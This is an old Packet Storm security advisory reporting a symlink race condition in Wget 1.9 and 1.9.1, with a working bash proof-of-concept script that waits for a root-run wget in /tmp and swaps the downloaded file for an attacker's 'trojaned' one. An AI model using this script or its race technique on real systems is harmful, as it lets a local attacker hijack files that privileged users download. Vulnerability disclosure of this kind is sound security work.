wgetuhoh.txt

2004-05-18T00:00:00
ID PACKETSTORM:33356
Type packetstorm
Reporter Hugo Vazquez
Modified 2004-05-18T00:00:00

Description

                                        
                                            `  
  
Tested software: Wget 1.9, Wget 1.9.1  
  
Wget checks for the presence of a file with the same name of the one invoqued at the command line, if the file exists, then it saves the downloaded file with a different name. The problem is that Wget does not lock the file, and directly writes to it. So there's a window time where Wget is exposed to a symlink attack  
(only on world writable directories)  
  
This is the attack sequence:  
  
1) Wget process starts  
2) File checking (but not locking!)  
<--- attacker creates symlink  
3) Wget writes on the wrong place  
  
  
As a P.o.C. here you have a very simple script that exploits this flaw with an attack I have called: "file hijacking".   
  
1)Open a shell and execute wget_race.sh with user A.  
2)Open another shell and with root user launch wget from /tmp:  
wget http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.26.bz2  
3) Check the content of /tmp/patch-2.4.26.bz2  
  
Smile :-)  
  
  
  
--------------- wget_race.sh ------------------------  
#!/bin/bash  
  
rm -f salida.txt pid.txt *.wget /tmp/patch-2.4.26.bz2  
echo "1">salida.txt  
a=`cat salida.txt`  
echo "Waiting for Wget execution..."  
  
while [ "$a" == 1 ]  
do  
ps auxw|grep wget|grep patch-2.4.26.bz2>>salida.txt  
a=`cat salida.txt`  
done  
  
echo "Process catched!"  
pgrep -u root wget>pid.txt  
ln -s /dev/null /tmp/patch-2.4.26.bz2  
echo "/dev/null link created!"  
echo "Waiting for downloading to finish..."  
  
b=`pgrep -u root wget`  
touch $b.wget  
c=1  
while [ "$c" == 1 ]  
do  
if [ -e .wget ]  
then  
c=0  
echo "Downloading finished! Let's delete the original file, and put our trojaned file :-)"  
rm -f /tmp/patch-2.4.26.bz2  
echo "Surprise!">/tmp/patch-2.4.26.bz2  
echo "Does it worked?"  
  
ls -la /tmp/patch-2.4.26.bz2  
  
else  
b=`pgrep -u root wget`  
touch $b.wget  
  
fi  
  
done  
  
-----------------------------------------------------  
  
This flaw open a wide range of attack vectors.  
Any program wich runs wget from a world writable directory is vulnerable.  
  
  
  
Hugo Vazquez Caramés  
  
hugo@infohacking.com  
`